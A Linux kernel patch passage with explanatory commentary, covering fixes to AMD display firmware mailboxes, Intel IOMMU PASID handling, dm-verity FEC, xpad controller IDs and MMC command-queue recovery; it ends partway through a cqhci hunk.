+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
+index 7d1a6eb4d6657..f15336b6e22be 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn32.h
+@@ -206,6 +206,8 @@ void dmub_dcn32_setup_windows(struct dmub_srv *dmub,
+ void dmub_dcn32_setup_mailbox(struct dmub_srv *dmub,
+ 			      const struct dmub_region *inbox1);
+ 
++uint32_t dmub_dcn32_get_inbox1_wptr(struct dmub_srv *dmub);
++
+ uint32_t dmub_dcn32_get_inbox1_rptr(struct dmub_srv *dmub);
+ 
+ void dmub_dcn32_set_inbox1_wptr(struct dmub_srv *dmub, uint32_t wptr_offset);
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index c3327875933e9..e951fd837aa27 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -167,6 +167,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load = dmub_dcn20_backdoor_load;
+ 		funcs->setup_windows = dmub_dcn20_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn20_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn20_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn20_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn20_set_inbox1_wptr;
+ 		funcs->is_supported = dmub_dcn20_is_supported;
+@@ -243,6 +244,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load = dmub_dcn31_backdoor_load;
+ 		funcs->setup_windows = dmub_dcn31_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn31_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn31_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn31_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn31_set_inbox1_wptr;
+ 		funcs->setup_out_mailbox = dmub_dcn31_setup_out_mailbox;
+@@ -281,6 +283,7 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 		funcs->backdoor_load_zfb_mode = dmub_dcn32_backdoor_load_zfb_mode;
+ 		funcs->setup_windows = dmub_dcn32_setup_windows;
+ 		funcs->setup_mailbox = dmub_dcn32_setup_mailbox;
++		funcs->get_inbox1_wptr = dmub_dcn32_get_inbox1_wptr;
+ 		funcs->get_inbox1_rptr = dmub_dcn32_get_inbox1_rptr;
+ 		funcs->set_inbox1_wptr = dmub_dcn32_set_inbox1_wptr;
+ 		funcs->setup_out_mailbox = dmub_dcn32_setup_out_mailbox;
+@@ -666,6 +669,27 @@ enum dmub_status dmub_srv_hw_init(struct dmub_srv *dmub,
+ 	return DMUB_STATUS_OK;
+ }
+ 
++enum dmub_status dmub_srv_sync_inbox1(struct dmub_srv *dmub)
++{
++	if (!dmub->sw_init)
++		return DMUB_STATUS_INVALID;
++
++	if (dmub->hw_funcs.get_inbox1_rptr && dmub->hw_funcs.get_inbox1_wptr) {
++		uint32_t rptr = dmub->hw_funcs.get_inbox1_rptr(dmub);
++		uint32_t wptr = dmub->hw_funcs.get_inbox1_wptr(dmub);
++
++		if (rptr > dmub->inbox1_rb.capacity || wptr > dmub->inbox1_rb.capacity) {
++			return DMUB_STATUS_HW_FAILURE;
++		} else {
++			dmub->inbox1_rb.rptr = rptr;
++			dmub->inbox1_rb.wrpt = wptr;
++			dmub->inbox1_last_wptr = dmub->inbox1_rb.wrpt;
++		}
++	}
++
++	return DMUB_STATUS_OK;
++}
++
+ enum dmub_status dmub_srv_hw_reset(struct dmub_srv *dmub)
+ {
+ 	if (!dmub->sw_init)
+@@ -694,6 +718,11 @@ enum dmub_status dmub_srv_cmd_queue(struct dmub_srv *dmub,
+ 	if (!dmub->hw_init)
+ 		return DMUB_STATUS_INVALID;
+ 
++	if (dmub->inbox1_rb.rptr > dmub->inbox1_rb.capacity ||
++	    dmub->inbox1_rb.wrpt > dmub->inbox1_rb.capacity) {
++		return DMUB_STATUS_HW_FAILURE;
++	}
++
+ 	if (dmub_rb_push_front(&dmub->inbox1_rb, cmd))
+ 		return DMUB_STATUS_OK;
+ 
+@@ -964,6 +993,7 @@ enum dmub_status dmub_srv_wait_for_inbox0_ack(struct dmub_srv *dmub, uint32_t ti
+ 		ack = dmub->hw_funcs.read_inbox0_ack_register(dmub);
+ 		if (ack)
+ 			return DMUB_STATUS_OK;
++		udelay(1);
+ 	}
+ 	return DMUB_STATUS_TIMEOUT;
+ }
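
The dmub_srv_sync_inbox1() helper added above re-reads the hardware inbox1 read and write pointers and refuses to adopt them when either lies beyond the ring capacity, and dmub_srv_cmd_queue() now performs the same bounds check before pushing a command, so a wedged or reset DMCUB firmware cannot leave the driver chasing pointers outside the ring. A minimal standalone sketch of that bounds check, using an illustrative ring type rather than the real dmub_rb:

#include <stdbool.h>
#include <stdint.h>

struct ring {
	uint32_t capacity;	/* ring size in bytes */
	uint32_t rptr;		/* software copy of the read pointer */
	uint32_t wptr;		/* software copy of the write pointer */
};

/* Adopt hardware pointers only when both fall inside the ring;
 * otherwise report a hardware failure, as the driver does with
 * DMUB_STATUS_HW_FAILURE. */
static bool ring_sync(struct ring *rb, uint32_t hw_rptr, uint32_t hw_wptr)
{
	if (hw_rptr > rb->capacity || hw_wptr > rb->capacity)
		return false;
	rb->rptr = hw_rptr;
	rb->wptr = hw_wptr;
	return true;
}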
+diff --git a/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h b/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
+index c92c4b83253f8..4bff1ef8a9a64 100644
+--- a/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
++++ b/drivers/gpu/drm/amd/include/asic_reg/gc/gc_11_0_0_offset.h
+@@ -6369,6 +6369,8 @@
+ #define regTCP_INVALIDATE_BASE_IDX                                                                      1
+ #define regTCP_STATUS                                                                                   0x19a1
+ #define regTCP_STATUS_BASE_IDX                                                                          1
++#define regTCP_CNTL                                                                                     0x19a2
++#define regTCP_CNTL_BASE_IDX                                                                            1
+ #define regTCP_CNTL2                                                                                    0x19a3
+ #define regTCP_CNTL2_BASE_IDX                                                                           1
+ #define regTCP_DEBUG_INDEX                                                                              0x19a5
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+index d30ec3005ea19..cd8b0ab0112ae 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/aldebaran_ppt.c
+@@ -258,8 +258,11 @@ static int aldebaran_tables_init(struct smu_context *smu)
+ 	}
+ 
+ 	smu_table->ecc_table = kzalloc(tables[SMU_TABLE_ECCINFO].size, GFP_KERNEL);
+-	if (!smu_table->ecc_table)
++	if (!smu_table->ecc_table) {
++		kfree(smu_table->metrics_table);
++		kfree(smu_table->gpu_metrics_table);
+ 		return -ENOMEM;
++	}
+ 
+ 	return 0;
+ }
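
The aldebaran change frees the two tables allocated earlier in the function when the ecc_table allocation fails, closing a memory leak on the -ENOMEM path. The same unwind idiom, as a standalone sketch with illustrative names in place of the SMU structures:

#include <stdlib.h>

struct tables { void *metrics, *gpu_metrics, *ecc; };

/* Each failure point releases everything allocated before it, so the
 * caller never leaks partial state on -ENOMEM. */
static int tables_init(struct tables *t, size_t m, size_t g, size_t e)
{
	t->metrics = calloc(1, m);
	if (!t->metrics)
		return -1;
	t->gpu_metrics = calloc(1, g);
	if (!t->gpu_metrics)
		goto err_metrics;
	t->ecc = calloc(1, e);
	if (!t->ecc)
		goto err_gpu;
	return 0;

err_gpu:
	free(t->gpu_metrics);
err_metrics:
	free(t->metrics);
	return -1;	/* -ENOMEM in the kernel version */
}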
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index fc6957fddce8e..8404286302b0c 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -136,6 +136,7 @@ static const struct xpad_device {
+ 	{ 0x044f, 0x0f07, "Thrustmaster, Inc. Controller", 0, XTYPE_XBOX },
+ 	{ 0x044f, 0x0f10, "Thrustmaster Modena GT Wheel", 0, XTYPE_XBOX },
+ 	{ 0x044f, 0xb326, "Thrustmaster Gamepad GP XID", 0, XTYPE_XBOX360 },
++	{ 0x03f0, 0x0495, "HyperX Clutch Gladiate", 0, XTYPE_XBOXONE },
+ 	{ 0x045e, 0x0202, "Microsoft X-Box pad v1 (US)", 0, XTYPE_XBOX },
+ 	{ 0x045e, 0x0285, "Microsoft X-Box pad (Japan)", 0, XTYPE_XBOX },
+ 	{ 0x045e, 0x0287, "Microsoft Xbox Controller S", 0, XTYPE_XBOX },
+@@ -459,6 +460,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x0079),		/* GPD Win 2 Controller */
+ 	XPAD_XBOX360_VENDOR(0x03eb),		/* Wooting Keyboards (Legacy) */
+ 	XPAD_XBOX360_VENDOR(0x044f),		/* Thrustmaster X-Box 360 controllers */
++	XPAD_XBOXONE_VENDOR(0x03f0),		/* HP HyperX Xbox One Controllers */
+ 	XPAD_XBOX360_VENDOR(0x045e),		/* Microsoft X-Box 360 controllers */
+ 	XPAD_XBOXONE_VENDOR(0x045e),		/* Microsoft X-Box One controllers */
+ 	XPAD_XBOX360_VENDOR(0x046d),		/* Logitech X-Box 360 style controllers */
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index f800989ea0462..418af1db0192d 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1495,6 +1495,15 @@ void qi_flush_dev_iotlb(struct intel_iommu *iommu, u16 sid, u16 pfsid,
+ {
+ 	struct qi_desc desc;
+ 
++	/*
++	 * VT-d spec, section 4.3:
++	 *
++	 * Software is recommended to not submit any Device-TLB invalidation
++	 * requests while address remapping hardware is disabled.
++	 */
++	if (!(iommu->gcmd & DMA_GCMD_TE))
++		return;
++
+ 	if (mask) {
+ 		addr |= (1ULL << (VTD_PAGE_SHIFT + mask - 1)) - 1;
+ 		desc.qw1 = QI_DEV_IOTLB_ADDR(addr) | QI_DEV_IOTLB_SIZE;
+@@ -1560,6 +1569,15 @@ void qi_flush_dev_iotlb_pasid(struct intel_iommu *iommu, u16 sid, u16 pfsid,
+ 	unsigned long mask = 1UL << (VTD_PAGE_SHIFT + size_order - 1);
+ 	struct qi_desc desc = {.qw1 = 0, .qw2 = 0, .qw3 = 0};
+ 
++	/*
++	 * VT-d spec, section 4.3:
++	 *
++	 * Software is recommended to not submit any Device-TLB invalidation
++	 * requests while address remapping hardware is disabled.
++	 */
++	if (!(iommu->gcmd & DMA_GCMD_TE))
++		return;
++
+ 	desc.qw0 = QI_DEV_EIOTLB_PASID(pasid) | QI_DEV_EIOTLB_SID(sid) |
+ 		QI_DEV_EIOTLB_QDEP(qdep) | QI_DEIOTLB_TYPE |
+ 		QI_DEV_IOTLB_PFSID(pfsid);
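
Both qi_flush_dev_iotlb() and qi_flush_dev_iotlb_pasid() now return early while DMA remapping is disabled, following the VT-d recommendation quoted in the new comments; submitting a Device-TLB invalidation with translation off risks the invalidation never completing on some platforms. The guard is a single bit test on the cached global command register value. A standalone sketch (the bit position matches the driver's DMA_GCMD_TE definition):

#include <stdbool.h>
#include <stdint.h>

#define DMA_GCMD_TE (UINT32_C(1) << 31)	/* translation-enable bit */

/* Device-TLB invalidation requests are dropped while remapping is off. */
static bool may_submit_dev_tlb_inval(uint32_t gcmd)
{
	return (gcmd & DMA_GCMD_TE) != 0;
}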
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 5c4f5aa8e87e4..e111b35a7aff2 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -277,7 +277,7 @@ static LIST_HEAD(dmar_satc_units);
+ #define for_each_rmrr_units(rmrr) \
+ 	list_for_each_entry(rmrr, &dmar_rmrr_units, list)
+ 
+-static void dmar_remove_one_dev_info(struct device *dev);
++static void device_block_translation(struct device *dev);
+ 
+ int dmar_disabled = !IS_ENABLED(CONFIG_INTEL_IOMMU_DEFAULT_ON);
+ int intel_iommu_sm = IS_ENABLED(CONFIG_INTEL_IOMMU_SCALABLE_MODE_DEFAULT_ON);
+@@ -1418,7 +1418,7 @@ static void iommu_enable_pci_caps(struct device_domain_info *info)
+ {
+ 	struct pci_dev *pdev;
+ 
+-	if (!info || !dev_is_pci(info->dev))
++	if (!dev_is_pci(info->dev))
+ 		return;
+ 
+ 	pdev = to_pci_dev(info->dev);
+@@ -2064,7 +2064,6 @@ static int domain_context_mapping_one(struct dmar_domain *domain,
+ 	} else {
+ 		iommu_flush_write_buffer(iommu);
+ 	}
+-	iommu_enable_pci_caps(info);
+ 
+ 	ret = 0;
+ 
+@@ -2494,13 +2493,6 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 
+ 	/* PASID table is mandatory for a PCI device in scalable mode. */
+ 	if (sm_supported(iommu) && !dev_is_real_dma_subdevice(dev)) {
+-		ret = intel_pasid_alloc_table(dev);
+-		if (ret) {
+-			dev_err(dev, "PASID table allocation failed\n");
+-			dmar_remove_one_dev_info(dev);
+-			return ret;
+-		}
+-
+ 		/* Setup the PASID entry for requests without PASID: */
+ 		if (hw_pass_through && domain_type_is_si(domain))
+ 			ret = intel_pasid_setup_pass_through(iommu, domain,
+@@ -2513,7 +2505,7 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 					dev, PASID_RID2PASID);
+ 		if (ret) {
+ 			dev_err(dev, "Setup RID2PASID failed\n");
+-			dmar_remove_one_dev_info(dev);
++			device_block_translation(dev);
+ 			return ret;
+ 		}
+ 	}
+@@ -2521,10 +2513,13 @@ static int domain_add_dev_info(struct dmar_domain *domain, struct device *dev)
+ 	ret = domain_context_mapping(domain, dev);
+ 	if (ret) {
+ 		dev_err(dev, "Domain context map failed\n");
+-		dmar_remove_one_dev_info(dev);
++		device_block_translation(dev);
+ 		return ret;
+ 	}
+ 
++	if (sm_supported(info->iommu) || !domain_type_is_si(info->domain))
++		iommu_enable_pci_caps(info);
++
+ 	return 0;
+ }
+ 
+@@ -4091,8 +4086,8 @@ static int domain_context_clear_one_cb(struct pci_dev *pdev, u16 alias, void *op
+  */
+ static void domain_context_clear(struct device_domain_info *info)
+ {
+-	if (!info->iommu || !info->dev || !dev_is_pci(info->dev))
+-		return;
++	if (!dev_is_pci(info->dev))
++		domain_context_clear_one(info, info->bus, info->devfn);
+ 
+ 	pci_for_each_dma_alias(to_pci_dev(info->dev),
+ 			       &domain_context_clear_one_cb, info);
+@@ -4112,7 +4107,6 @@ static void dmar_remove_one_dev_info(struct device *dev)
+ 
+ 		iommu_disable_dev_iotlb(info);
+ 		domain_context_clear(info);
+-		intel_pasid_free_table(info->dev);
+ 	}
+ 
+ 	spin_lock_irqsave(&domain->lock, flags);
+@@ -4123,6 +4117,37 @@ static void dmar_remove_one_dev_info(struct device *dev)
+ 	info->domain = NULL;
+ }
+ 
++/*
++ * Clear the page table pointer in context or pasid table entries so that
++ * all DMA requests without PASID from the device are blocked. If the page
++ * table has been set, clean up the data structures.
++ */
++static void device_block_translation(struct device *dev)
++{
++	struct device_domain_info *info = dev_iommu_priv_get(dev);
++	struct intel_iommu *iommu = info->iommu;
++	unsigned long flags;
++
++	iommu_disable_dev_iotlb(info);
++	if (!dev_is_real_dma_subdevice(dev)) {
++		if (sm_supported(iommu))
++			intel_pasid_tear_down_entry(iommu, dev,
++						    PASID_RID2PASID, false);
++		else
++			domain_context_clear(info);
++	}
++
++	if (!info->domain)
++		return;
++
++	spin_lock_irqsave(&info->domain->lock, flags);
++	list_del(&info->link);
++	spin_unlock_irqrestore(&info->domain->lock, flags);
++
++	domain_detach_iommu(info->domain, iommu);
++	info->domain = NULL;
++}
++
+ static int md_domain_init(struct dmar_domain *domain, int guest_width)
+ {
+ 	int adjust_width;
+@@ -4246,7 +4271,7 @@ static int intel_iommu_attach_device(struct iommu_domain *domain,
+ 		struct device_domain_info *info = dev_iommu_priv_get(dev);
+ 
+ 		if (info->domain)
+-			dmar_remove_one_dev_info(dev);
++			device_block_translation(dev);
+ 	}
+ 
+ 	ret = prepare_domain_attach_device(domain, dev);
+@@ -4477,6 +4502,7 @@ static struct iommu_device *intel_iommu_probe_device(struct device *dev)
+ 	struct device_domain_info *info;
+ 	struct intel_iommu *iommu;
+ 	u8 bus, devfn;
++	int ret;
+ 
+ 	iommu = device_to_iommu(dev, &bus, &devfn);
+ 	if (!iommu || !iommu->iommu.ops)
+@@ -4521,6 +4547,16 @@ static struct iommu_device *intel_iommu_probe_device(struct device *dev)
+ 
+ 	dev_iommu_priv_set(dev, info);
+ 
++	if (sm_supported(iommu) && !dev_is_real_dma_subdevice(dev)) {
++		ret = intel_pasid_alloc_table(dev);
++		if (ret) {
++			dev_err(dev, "PASID table allocation failed\n");
++			dev_iommu_priv_set(dev, NULL);
++			kfree(info);
++			return ERR_PTR(ret);
++		}
++	}
++
+ 	return &iommu->iommu;
+ }
+ 
+@@ -4529,6 +4565,7 @@ static void intel_iommu_release_device(struct device *dev)
+ 	struct device_domain_info *info = dev_iommu_priv_get(dev);
+ 
+ 	dmar_remove_one_dev_info(dev);
++	intel_pasid_free_table(dev);
+ 	dev_iommu_priv_set(dev, NULL);
+ 	kfree(info);
+ 	set_dma_ops(dev, NULL);
+@@ -4872,7 +4909,7 @@ static void quirk_igfx_skip_te_disable(struct pci_dev *dev)
+ 	ver = (dev->device >> 8) & 0xff;
+ 	if (ver != 0x45 && ver != 0x46 && ver != 0x4c &&
+ 	    ver != 0x4e && ver != 0x8a && ver != 0x98 &&
+-	    ver != 0x9a && ver != 0xa7)
++	    ver != 0x9a && ver != 0xa7 && ver != 0x7d)
+ 		return;
+ 
+ 	if (risky_device(dev))
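
Taken together, these iommu.c hunks move the PASID table's lifetime out of the attach/detach path: the table is allocated once in intel_iommu_probe_device() and freed only in intel_iommu_release_device(), while detaching a domain now goes through the new device_block_translation(), which tears down translation entries without touching the table. A compressed sketch of the resulting pairing, with plain calloc/free standing in for the real table helpers:

#include <stdlib.h>

struct dev_info {
	void *pasid_table;	/* allocated once per device at probe */
};

static int probe_device(struct dev_info *info, size_t table_size)
{
	info->pasid_table = calloc(1, table_size);
	return info->pasid_table ? 0 : -1;	/* -ENOMEM in the driver */
}

/* Detach/blocking clears translation entries but never frees the table. */
static void block_translation(struct dev_info *info)
{
	(void)info;
}

static void release_device(struct dev_info *info)
{
	free(info->pasid_table);	/* paired with probe, not with attach */
	info->pasid_table = NULL;
}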
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 4d3595d6d1c40..05e3157fc7b4e 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1489,7 +1489,7 @@ out_nocoalesce:
+ 	bch_keylist_free(&keylist);
+ 
+ 	for (i = 0; i < nodes; i++)
+-		if (!IS_ERR(new_nodes[i])) {
++		if (!IS_ERR_OR_NULL(new_nodes[i])) {
+ 			btree_node_free(new_nodes[i]);
+ 			rw_unlock(true, new_nodes[i]);
+ 		}
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 9eb03bb224698..0304e36af329c 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -24,7 +24,8 @@ bool verity_fec_is_enabled(struct dm_verity *v)
+  */
+ static inline struct dm_verity_fec_io *fec_io(struct dm_verity_io *io)
+ {
+-	return (struct dm_verity_fec_io *) verity_io_digest_end(io->v, io);
++	return (struct dm_verity_fec_io *)
++		((char *)io + io->v->ti->per_io_data_size - sizeof(struct dm_verity_fec_io));
+ }
+ 
+ /*
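
The new fec_io() derives the per-bio FEC state from the tail of the per-I/O area that device-mapper actually allocated (io->v->ti->per_io_data_size), instead of stepping forward past the hash request and digest buffers via the removed verity_io_digest_end(); the companion hunk moves verity_fec_init_io() into verity_map() so the state is initialized once, before any completion path can consult it. A simplified model of the tail-carving arithmetic, with illustrative struct names:

#include <stddef.h>
#include <stdint.h>

struct io_base { int placeholder; };	/* head of the per-I/O area */
struct fec_state { uint8_t scratch[64]; };

/* The FEC state occupies the final sizeof(struct fec_state) bytes of
 * the per-I/O allocation, regardless of what precedes it. */
static struct fec_state *fec_of(struct io_base *io, size_t per_io_size)
{
	return (struct fec_state *)
		((char *)io + per_io_size - sizeof(struct fec_state));
}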
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index b86d41219ba9c..24df610a2c438 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -631,7 +631,6 @@ static void verity_work(struct work_struct *w)
+ 
+ 	io->in_tasklet = false;
+ 
+-	verity_fec_init_io(io);
+ 	verity_finish_io(io, errno_to_blk_status(verity_verify_io(io)));
+ }
+ 
+@@ -657,7 +656,9 @@ static void verity_end_io(struct bio *bio)
+ 	struct dm_verity_io *io = bio->bi_private;
+ 
+ 	if (bio->bi_status &&
+-	    (!verity_fec_is_enabled(io->v) || verity_is_system_shutting_down())) {
++	    (!verity_fec_is_enabled(io->v) ||
++	     verity_is_system_shutting_down() ||
++	     (bio->bi_opf & REQ_RAHEAD))) {
+ 		verity_finish_io(io, bio->bi_status);
+ 		return;
+ 	}
+@@ -779,6 +780,8 @@ static int verity_map(struct dm_target *ti, struct bio *bio)
+ 	bio->bi_private = io;
+ 	io->iter = bio->bi_iter;
+ 
++	verity_fec_init_io(io);
++
+ 	verity_submit_prefetch(v, io);
+ 
+ 	submit_bio_noacct(bio);
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f96f4e281ee4a..f9d522c870e61 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -115,12 +115,6 @@ static inline u8 *verity_io_want_digest(struct dm_verity *v,
+ 	return (u8 *)(io + 1) + v->ahash_reqsize + v->digest_size;
+ }
+ 
+-static inline u8 *verity_io_digest_end(struct dm_verity *v,
+-				       struct dm_verity_io *io)
+-{
+-	return verity_io_want_digest(v, io) + v->digest_size;
+-}
+-
+ extern int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 			       struct bvec_iter *iter,
+ 			       int (*process)(struct dm_verity *v,
+diff --git a/drivers/mmc/core/block.c b/drivers/mmc/core/block.c
+index 67a7ae9b997aa..770490234c872 100644
+--- a/drivers/mmc/core/block.c
++++ b/drivers/mmc/core/block.c
+@@ -1505,6 +1505,8 @@ static void mmc_blk_cqe_complete_rq(struct mmc_queue *mq, struct request *req)
+ 			blk_mq_requeue_request(req, true);
+ 		else
+ 			__blk_mq_end_request(req, BLK_STS_OK);
++	} else if (mq->in_recovery) {
++		blk_mq_requeue_request(req, true);
+ 	} else {
+ 		blk_mq_end_request(req, BLK_STS_OK);
+ 	}
+diff --git a/drivers/mmc/core/core.c b/drivers/mmc/core/core.c
+index de1cc9e1ae576..df85c35a86a3b 100644
+--- a/drivers/mmc/core/core.c
++++ b/drivers/mmc/core/core.c
+@@ -552,7 +552,9 @@ int mmc_cqe_recovery(struct mmc_host *host)
+ 	cmd.flags        = MMC_RSP_R1B | MMC_CMD_AC;
+ 	cmd.flags       &= ~MMC_RSP_CRC; /* Ignore CRC */
+ 	cmd.busy_timeout = MMC_CQE_RECOVERY_TIMEOUT;
+-	mmc_wait_for_cmd(host, &cmd, 0);
++	mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
++
++	mmc_poll_for_busy(host->card, MMC_CQE_RECOVERY_TIMEOUT, true, MMC_BUSY_IO);
+ 
+ 	memset(&cmd, 0, sizeof(cmd));
+ 	cmd.opcode       = MMC_CMDQ_TASK_MGMT;
+@@ -560,10 +562,13 @@ int mmc_cqe_recovery(struct mmc_host *host)
+ 	cmd.flags        = MMC_RSP_R1B | MMC_CMD_AC;
+ 	cmd.flags       &= ~MMC_RSP_CRC; /* Ignore CRC */
+ 	cmd.busy_timeout = MMC_CQE_RECOVERY_TIMEOUT;
+-	err = mmc_wait_for_cmd(host, &cmd, 0);
++	err = mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
+ 
+ 	host->cqe_ops->cqe_recovery_finish(host);
+ 
++	if (err)
++		err = mmc_wait_for_cmd(host, &cmd, MMC_CMD_RETRIES);
++
+ 	mmc_retune_release(host);
+ 
+ 	return err;
+diff --git a/drivers/mmc/core/regulator.c b/drivers/mmc/core/regulator.c
+index 609201a467ef9..4dcbc2281d2b5 100644
+--- a/drivers/mmc/core/regulator.c
++++ b/drivers/mmc/core/regulator.c
+@@ -271,3 +271,44 @@ int mmc_regulator_get_supply(struct mmc_host *mmc)
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(mmc_regulator_get_supply);
++
++/**
++ * mmc_regulator_enable_vqmmc - enable VQMMC regulator for a host
++ * @mmc: the host to regulate
++ *
++ * Returns 0 or errno. Enables the regulator for vqmmc.
++ * Keeps track of the enable status for ensuring that calls to
++ * regulator_enable/disable are balanced.
++ */
++int mmc_regulator_enable_vqmmc(struct mmc_host *mmc)
++{
++	int ret = 0;
++
++	if (!IS_ERR(mmc->supply.vqmmc) && !mmc->vqmmc_enabled) {
++		ret = regulator_enable(mmc->supply.vqmmc);
++		if (ret < 0)
++			dev_err(mmc_dev(mmc), "enabling vqmmc regulator failed\n");
++		else
++			mmc->vqmmc_enabled = true;
++	}
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(mmc_regulator_enable_vqmmc);
++
++/**
++ * mmc_regulator_disable_vqmmc - disable VQMMC regulator for a host
++ * @mmc: the host to regulate
++ *
++ * Returns 0 or errno. Disables the regulator for vqmmc.
++ * Keeps track of the enable status for ensuring that calls to
++ * regulator_enable/disable are balanced.
++ */
++void mmc_regulator_disable_vqmmc(struct mmc_host *mmc)
++{
++	if (!IS_ERR(mmc->supply.vqmmc) && mmc->vqmmc_enabled) {
++		regulator_disable(mmc->supply.vqmmc);
++		mmc->vqmmc_enabled = false;
++	}
++}
++EXPORT_SYMBOL_GPL(mmc_regulator_disable_vqmmc);
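
mmc_regulator_enable_vqmmc() and mmc_regulator_disable_vqmmc() wrap the raw regulator calls with a per-host vqmmc_enabled flag so callers cannot unbalance the regulator core's enable count; the sdhci-sprd hunks below, which gain a .set_power callback, appear to be the consumer this backport serves. The tracking pattern as a standalone sketch (the supply type stands in for the host's regulator handle):

#include <stdbool.h>

struct supply {
	bool enabled;	/* mirrors mmc->vqmmc_enabled */
	int refcnt;	/* stands in for the regulator core's count */
};

static int supply_enable(struct supply *s)
{
	if (!s->enabled) {
		s->refcnt++;	/* regulator_enable() in the real code */
		s->enabled = true;
	}
	return 0;
}

static void supply_disable(struct supply *s)
{
	if (s->enabled) {
		s->refcnt--;	/* regulator_disable() in the real code */
		s->enabled = false;
	}
}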
+diff --git a/drivers/mmc/host/cqhci-core.c b/drivers/mmc/host/cqhci-core.c
+index b3d7d6d8d6548..41e94cd141098 100644
+--- a/drivers/mmc/host/cqhci-core.c
++++ b/drivers/mmc/host/cqhci-core.c
+@@ -942,8 +942,8 @@ static bool cqhci_clear_all_tasks(struct mmc_host *mmc, unsigned int timeout)
+ 	ret = cqhci_tasks_cleared(cq_host);
+ 
+ 	if (!ret)
+-		pr_debug("%s: cqhci: Failed to clear tasks\n",
+-			 mmc_hostname(mmc));
++		pr_warn("%s: cqhci: Failed to clear tasks\n",
++			mmc_hostname(mmc));
+ 
+ 	return ret;
+ }
+@@ -976,7 +976,7 @@ static bool cqhci_halt(struct mmc_host *mmc, unsigned int timeout)
+ 	ret = cqhci_halted(cq_host);
+ 
+ 	if (!ret)
+-		pr_debug("%s: cqhci: Failed to halt\n", mmc_hostname(mmc));
++		pr_warn("%s: cqhci: Failed to halt\n", mmc_hostname(mmc));
+ 
+ 	return ret;
+ }
+@@ -984,10 +984,10 @@ static bool cqhci_halt(struct mmc_host *mmc, unsigned int timeout)
+ /*
+  * After halting we expect to be able to use the command line. We interpret the
+  * failure to halt to mean the data lines might still be in use (and the upper
+- * layers will need to send a STOP command), so we set the timeout based on a
+- * generous command timeout.
++ * layers will need to send a STOP command), however failing to halt complicates
++ * the recovery, so set a timeout that would reasonably allow I/O to complete.
+  */
+-#define CQHCI_START_HALT_TIMEOUT	5
++#define CQHCI_START_HALT_TIMEOUT	500
+ 
+ static void cqhci_recovery_start(struct mmc_host *mmc)
+ {
+@@ -1075,28 +1075,28 @@ static void cqhci_recovery_finish(struct mmc_host *mmc)
+ 
+ 	ok = cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
+ 
+-	if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
+-		ok = false;
+-
+ 	/*
+ 	 * The specification contradicts itself, by saying that tasks cannot be
+ 	 * cleared if CQHCI does not halt, but if CQHCI does not halt, it should
+ 	 * be disabled/re-enabled, but not to disable before clearing tasks.
+ 	 * Have a go anyway.
+ 	 */
+-	if (!ok) {
+-		pr_debug("%s: cqhci: disable / re-enable\n", mmc_hostname(mmc));
